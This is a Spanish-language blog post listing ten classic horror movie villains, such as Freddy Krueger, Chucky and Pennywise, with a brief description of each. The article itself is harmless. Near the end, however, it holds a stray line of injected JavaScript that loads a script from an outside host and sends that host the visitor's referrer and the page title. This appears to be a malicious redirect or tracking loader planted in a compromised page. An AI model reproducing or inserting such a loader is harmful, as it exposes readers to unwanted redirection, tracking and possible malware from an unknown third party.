10 personajes de terror clásicos

Aquí tenemos una lista de los 10 personajes de terror más clásicos. Es importante mencionar  que son aquellos personajes de películas de terror antiguas, aunque algunas han tenido versiones más actuales o remakes con otros actores. Algunas de estas películas no tienen una calificación muy elevada por la crítica, pero, aun así, son figuras importantes dentro del cine de terror, seguramente los conoces a todos pero alguno que otro ha pasado más desapercibido. 

Freddy Krueger

El personaje famosos de Pesadilla en la calle Elm, imposible no conocerlo, merodeando por nuestros sueños y tratando de matarnos en su mundo. Utiliza unas cuchillas en sus manos que provienen de un guante. Todo un clásico.

Jason Voorhees

Personaje de Viernes 13. Un hombre alto con aspecto muy peculiar, una máscara de hockey que le cubre su rostro mutilado. Su arma es un machete.

Michael Myers

Es el asesino de la saga de Halloween, un hombre muy alto y fuerte que mata con cualquier utensilio que encuentre (en la mayoría de los casos, un cuchillo de cocina). Es un personaje de terror muy famoso, al igual que los últimos dos.

Leprechaun

Un duende maldito que matara a cualquiera que hurte su oro, aunque solo sea una moneda, es capaz de cumplir tus deseos pero de la forma más horrible y despiadada que te imaginas.

Regan Mcneil

Si viste el exorcista, no hay mucho que mencionar. Un personaje que nos colocó a todos mucha presión en una sala de cine, y aun así, después de mucho tiempo se ha convertido en uno de los personajes más escalofriantes de la historia.

Leather  Face

El asesino de la sierra eléctrica que pertenece a una familia de locos y caníbales. Un personaje clásico pero muy importante para la lista.

 

Tall Man (Phantasma)

Este personaje también es un clásico del terror que lamentablemente no es muy conocido pero sin duda forma parte de los clásicos. Un hombre con fuerza inhumana y poderes, con los cuales puede manipular objetos y asesinar a sus víctimas.

The Djinn (Wishmaster)

Un demonio que trata de regresar a la tierra, capaz de cumplir los deseos de las personas, pero, ten cuidado con lo que deseas.  Un personaje que fue creado por Wes Craven.

Chucky

Un muñeco que nos rompió el sueño a algunos de nosotros, sin importar que la película no fuese una excelente pieza. Chucky se encargó de ser uno de  esos clásicos del cine de terror, nadie podría dormir en paz con un juguete como ese merodeando en casa.

Pennywise (It)

Bueno… No podía faltar Pennywise.  Simplemente digamos que es uno de los personajes más aterradores de la historia, y no es porque nosotros los pensemos, creemos que es por todo el mundo.

 

Sabemos que algunos personajes del cine de terror también faltan en esta lista, pero nunca terminaríamos. Lo sentimos Hannibal, Puppet Master, Norman Bates, Candy Man, entre otros.

 

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:
Comentarios